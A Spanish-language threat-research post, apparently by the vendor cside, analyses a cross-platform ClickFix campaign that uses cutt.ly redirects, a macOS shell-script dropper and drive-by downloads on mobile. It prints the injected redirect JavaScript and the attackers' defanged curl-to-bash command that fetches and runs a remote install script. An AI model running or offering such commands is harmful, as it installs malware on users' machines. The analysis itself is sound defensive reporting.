Resumen: cadena ClickFix con acortador cutt.ly atacando macOS, Android e iOS con un tarball drive-by
- No solo Windows: ClickFix quedó archivado como simples prompts de PowerShell en Windows, y se olvidó. Ese modelo mental es precisamente la razón por la que la misma cadena de ingeniería social funciona ahora en terminales de macOS, descargas drive-by en Android y archivos tar protegidos con contraseña en iOS.
- La cadena de ataque: La cadena empezaba con idjhvn4m[.]pro cargando un JavaScript inusualmente limpio, redirigía a través de kbmljxm[.]com y un acortador cutt.ly legítimo, y después soltaba un script de shell para macOS desde vuwzer[.]com detectado por 10 motores, y una carga útil móvil de iteslawow[.]com detectada por 5 motores en VirusTotal. cside captura el script real que recibe cada usuario y utiliza detección asistida por LLM para señalar flujos de descarga dirigidos a sistemas operativos específicos.
- Revisa la suposición: Si tu equipo de endpoint descartó ClickFix como un problema exclusivo de Windows, revisa esa suposición esta semana. Los atacantes se han movido a multiplataforma, y los escáneres estáticos siguen recibiendo contenido limpio porque no pueden ver la cadena de redirección que ve el visitante.
¿Poco tiempo? Consulta el bloqueo de Magecart y skimmers en el navegador de cside. Cubre todo lo de abajo en un solo despliegue.
Lo que comenzó como un truco de ingeniería social centrado en Windows se ha convertido en una amenaza multiplataforma del lado del cliente. En este artículo, desglosamos una variante reciente de ClickFix que ahora apunta a macOS, Android e iOS, utilizando redirecciones basadas en navegador, mensajes de interfaz de usuario falsos y técnicas de descarga no autorizada.
¿Qué es un ataque ClickFix?
Los ataques ClickFix no son nuevos. Mi primer encuentro con uno fue en septiembre de 2024:

Un ataque ClickFix es una forma de ingeniería social dirigida o un ataque del lado del cliente que explota el instinto del usuario de "simplemente arreglar el problema". Normalmente empieza con un mensaje convincente que señala un supuesto problema (como una vulnerabilidad de seguridad o un problema de repositorio). Se insta al usuario a hacer clic en un enlace o ejecutar un comando, creyendo que está resolviendo algo importante.
En este ejemplo de ataque, se pide al usuario que ejecute un script en la terminal. En Windows, eso significaba PowerShell. La misma técnica también funciona en macOS y Linux. Y al igual que con Windows, asumí que los usuarios no caerían en la trampa.
Sin embargo, las suposiciones son un juego peligroso en ciberseguridad, algo que lamentablemente se demostró una vez más.
Somos cside, y monitorizamos ataques de scripts de terceros del lado del cliente y mejoramos la protección en tiempo real del lado del cliente para sitios web y sus usuarios. Solo en los últimos tres meses, hemos observado más de 300K sitios web comprometidos.
Esta es la segunda vez que damos a conocer que los atacantes han hecho evolucionar sus TTP (Tácticas, Técnicas y Procedimientos).
Pero lo que antes era una amenaza exclusiva de Windows, ahora también apunta a otros sistemas operativos.
El ataque en detalle
Recibimos una alerta para un JavaScript descargado de:
hxxps://idjhvn4m[.]pro?h=7bd350a4ed55a8faf2e45301d70d2&user=16El script entregado:
(function () { var sitename = document.querySelector("meta[property='og:url']").getAttribute("content"); const mysite = new URL(sitename);const mysitename = `${mysite.protocol}//${mysite.hostname}`;var mytitle = document.querySelector("meta[property='og:title']").getAttribute("content"); var xtitle_spe = mytitle.replace(/[&\/\\#, +()$~%.'":*?<>{}]/g, '-'); var xtitle_spa = xtitle_spe.replace(/\s+/g, '-'); var oldurl = 'https://kbmljxm.com/?s={KEYWORD}&p=16'; var final_url_1 = oldurl.replace('{KEYWORD}', xtitle_spa);var final_url_2 = final_url_1.replace('{site}', mysitename); var id = 16; var successResponse = final_url_2; var elements = document.getElementsByClassName("buttonPress-"+16); for(var i = 0; i < elements.length; i++) {var anchor = elements[i];anchor.onclick = function() {window.open(successResponse, '_blank');}} })();
Este JavaScript no está muy ofuscado, algo poco común en este tipo de ataques. Crea un controlador de clic para elementos con un nombre de clase específico que abre una URL en una pestaña nueva al hacer clic. Esto es lo que hace:
- Toma una URL de plantilla (hxxps://kbmljxm[.]com/?s={KEYWORD}&p=16)
- Reemplaza {KEYWORD} con el título de página procesado
- Añade controladores de clic a todos los elementos con la clase buttonPress-16
- Al hacer clic, estos elementos abren la URL construida en una pestaña nueva
A continuación se muestra la cadena de redirección:


Cadena de redirección en la interfaz de usuario
La página parece un acortador de URL y le pide al usuario que copie un enlace. Los atacantes están abusando de cutt[.]ly, un acortador de URL legítimo.
Cuando un usuario pega la URL acortada en el navegador, se le redirige a:

Esta página de acortador de URL imitada muestra la siguiente ventana emergente:
"Pega el enlace que copiaste en la línea de dirección del navegador."

Luego redirige al usuario a una página de descarga (en este caso, para macOS):

/bin/bash -c "$(curl -fsSL hxxps://vuwzer[.]com/get/install.sh)"
El contenido de este archivo shell es el siguiente, según esta captura de pantalla:

Este script de shell luego descarga un ejecutable de macOS (detectado por 10 motores antivirus en VirusTotal).

Comportamiento en Android e iOS
Cuando probamos esto en Android e iOS, esperábamos una variante de ClickFix. En cambio, nos encontramos con un ataque drive-by.
Un ataque drive-by es un tipo de ciberataque en el que se ejecuta o descarga código malicioso en un dispositivo simplemente al visitar una página web comprometida o maliciosa. No se requieren clics, instalaciones ni ningún tipo de interacción.
La página ahora nos redirigió a:
hxxps://iteslawow[.]com/?=ijn&diu=16&sid=npT
Este sitio descargó un archivo .tar (protegido con contraseña mediante 7zip) que, al extraerse, soltaba el malware (detectado por 5 motores antivirus). También fue detectado por 5 proveedores en VirusTotal.
Fue detectado por 5 proveedores en VirusTotal.

Tanto en el sistema operativo Android como en Windows, se utilizó este estilo de ataque drive-by.
Este ataque muestra hasta qué punto los atacantes están ampliando su alcance. Lo que comenzó como una campaña ClickFix específica de Windows ahora apunta a macOS, Android e iOS, ampliando significativamente la escala de la operación.
Es otro recordatorio de lo ampliamente que se están extendiendo los ataques del lado del cliente, y de las muchas formas que pueden adoptar, todo ello aprovechando la confianza que los usuarios depositan en las interacciones del navegador cuando la seguridad del lado del cliente es deficiente o se aplica mal.









